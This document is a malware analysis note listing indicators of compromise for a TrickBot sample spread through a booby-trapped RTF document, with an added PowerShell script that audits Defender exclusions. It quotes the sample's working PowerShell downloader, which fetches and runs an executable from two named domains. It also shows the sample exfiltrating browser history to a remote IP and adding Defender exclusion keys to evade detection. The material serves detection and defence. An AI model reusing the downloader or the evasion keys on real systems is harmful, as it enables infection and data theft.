- #malware #trickbot
- found by @neonprimetime security
- sample: https://www.reverse.it/sample/4087601bfc591c48bf90026164dde735b91f08898fbef13f0e85c8e64fc79487?environmentId=120
- iocs:
- correspondence.doc
- fd55b840d747fc0601b03f53d5d3d314
- task.bat
- D7746CD2D5E2BBF4961704E76A13EECB
- digitalmindsolution.com
- thirdeyetv.com
- lewl.bin
- greg4545.exe
- A6DCE7423960304106B6AD8D7F7D9FAD
- copied itself to:
- C:\Users\xxxxx\AppData\Roaming\winhttp\
- launched its own copy of svchost.exe
- files created:
- C:\Users\Win7\AppData\Roaming\winhttp\FAQ
- C:\Users\Win7\AppData\Roaming\winhttp\README.md
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64 ( md5,861CFB79C14293F1DA731E42B90BD811 )
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\systeminfo64 ( md5,5D4512296AA66BFC0F2AE610556D84F2 )
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dinj (md5,7AED4235BC16913C98DCC866C087F38C)
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dpost (md5,15B4898CF67FF914DBA1EEF3BC6C9646)
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\sinj (md5,2DFB40BAA7110C0418DA49F997710A9E)
- registry keys added:
- HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
- HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
- HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
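Added example, not part of the original paste: a PowerShell audit of the three Defender exclusion-path keys listed above that flags any exclusion pointing into a user profile's AppData tree, which is where this sample registered its winhttp folder.

```powershell
# Added example, not from the original paste: enumerate Windows Defender
# exclusion paths and flag entries under a user profile's AppData tree.
# Run from an elevated prompt; recent Windows builds restrict read access
# to the Exclusions keys for non-administrators.
$ExclusionKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths',
    'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths'
)

function Get-UserProfileDefenderExclusions {
    param([string[]] $Keys = $ExclusionKeys)

    foreach ($Key in $Keys) {
        if (-not (Test-Path -LiteralPath $Key)) { continue }
        $RegKey = Get-Item -LiteralPath $Key
        # Each exclusion is stored as a REG_DWORD value whose NAME is the
        # excluded path; the data is 0x0, exactly as in the sandbox output.
        foreach ($Path in $RegKey.GetValueNames()) {
            [pscustomobject]@{
                Key        = $Key
                Path       = $Path
                # An exclusion under a user-writable AppData tree is rarely
                # legitimate on a managed host and warrants a closer look.
                Suspicious = ($Path -match '\\Users\\[^\\]+\\AppData\\')
            }
        }
    }
}

Get-UserProfileDefenderExclusions |
    Where-Object Suspicious |
    Format-Table -AutoSize
```

For a cross-check that does not depend on registry ACLs, compare the result against `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`; a path present in the registry but absent from that list indicates the Policies key is not being applied or has been tampered with.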
- network connections:
- GET /ip HTTP/1.1
- Connection: Keep-Alive
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
- Host: ipinfo.io
- POST /ser0514ca/[REDACTED PC NAME]_W617601.5A9716C6537690A1A0AA513B7AEF3301/82/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- Host: 70.182.4.158
- Content-Disposition: form-data; name="data"
- **** REDACTED LIST OF FILES I HAD OPEN AND URLS I HAD OPEN IN BROWSER ****
- Content-Disposition: form-data; name="source"
- IE history
- interesting in-memory strings:
- 0x1e276a (90): C:\Users\Win7\AppData\Roaming\winhttp\bad.exe
- script in the RTF:
- PowerShell ""function irJohn74([String] $KingOfSleep){(New-Object System.Net.WebClient).DownloadFile($KingOfSleep,'%TEMP%\greg4545.exe');Start-Process '%TEMP%\greg4545.exe';}try{irJohn74('http://digitalmindsolution.com/lewl.bin')}catch{irJohn74('http://thirdeyetv.com/lewl.bin')}""
- vt hits for RTF/DOC:
- MicroWorld-eScan,Exploit.RTF-PSH.Gen,14.05.2018,1
- CAT-QuickHeal,Exp.RTF.Heur.Gen.A,14.05.2018,1
- McAfee,Exploit-CVE2017-11882.p,14.05.2018,1
- Arcabit,Exploit.RTF-PSH.Gen,14.05.2018,1
- Kaspersky,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
- BitDefender,Exploit.RTF-PSH.Gen,14.05.2018,1
- Ad-Aware,Exploit.RTF-PSH.Gen,14.05.2018,1
- Sophos,Exp/201711882-M,14.05.2018,1
- F-Secure,Exploit.RTF-PSH.Gen,14.05.2018,1
- TrendMicro,HEUR_RTFMALFORM,14.05.2018,1
- McAfee-GW-Edition,Exploit-CVE2017-11882.p,14.05.2018,1
- Emsisoft,Exploit.RTF-PSH.Gen (B),14.05.2018,1
- Avira,EXP/CVE-2017-11882.Gen,14.05.2018,1
- AegisLab,Exploit.Msoffice.Generic!c,14.05.2018,1
- ZoneAlarm,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
- GData,Exploit.CVE-2017-11882.Gen,14.05.2018,1
- ALYac,Exploit.RTF-PSH.Gen,14.05.2018,1
- MAX,malware (ai score=81),14.05.2018,1
- Tencent,Office.Exploit.Generic.Efar,14.05.2018,1
- Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
- Qihoo-360,Win32/Trojan.Exploit.ed7,14.05.2018,1
- vt hits for EXE:
- MicroWorld-eScan,Trojan.GenericKD.40242422,15.05.2018,0
- Cylance,Unsafe,15.05.2018,0
- Invincea,heuristic,03.05.2018,12
- Symantec,ML.Attribute.HighConfidence,14.05.2018,1
- TrendMicro-HouseCall,Suspicious_GEN.F47V0514,15.05.2018,0
- Avast,FileRepMalware,15.05.2018,0
- Kaspersky,UDS:DangerousObject.Multi.Generic,15.05.2018,0
- Babable,Malware.HighConfidence,06.04.2018,39
- AegisLab,Ml.Attribute.Gen!c,15.05.2018,0
- Ad-Aware,Trojan.GenericKD.40242422,15.05.2018,0
- McAfee-GW-Edition,BehavesLike.Win32.Ransomware.gh,14.05.2018,1
- SentinelOne,static engine - malicious,25.02.2018,79
- Webroot,W32.Malware.Gen,15.05.2018,0
- Endgame,malicious (high confidence),07.05.2018,8
- ZoneAlarm,Trojan.Win32.Inject.ajogy,15.05.2018,0
- McAfee,Artemis!A6DCE7423960,15.05.2018,0
- VBA32,BScope.Trojan.Inject,14.05.2018,1
- ESET-NOD32,Win32/TrickBot.AQ,15.05.2018,0
- Ikarus,PUA.Multibar,14.05.2018,1
- AVG,FileRepMalware,15.05.2018,0
- Paloalto,generic.ml,15.05.2018,0
- vt hits for batch script:
- McAfee,PS/Agent.u,14.05.2018,1
- McAfee-GW-Edition,PS/Agent.u,14.05.2018,1
- Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1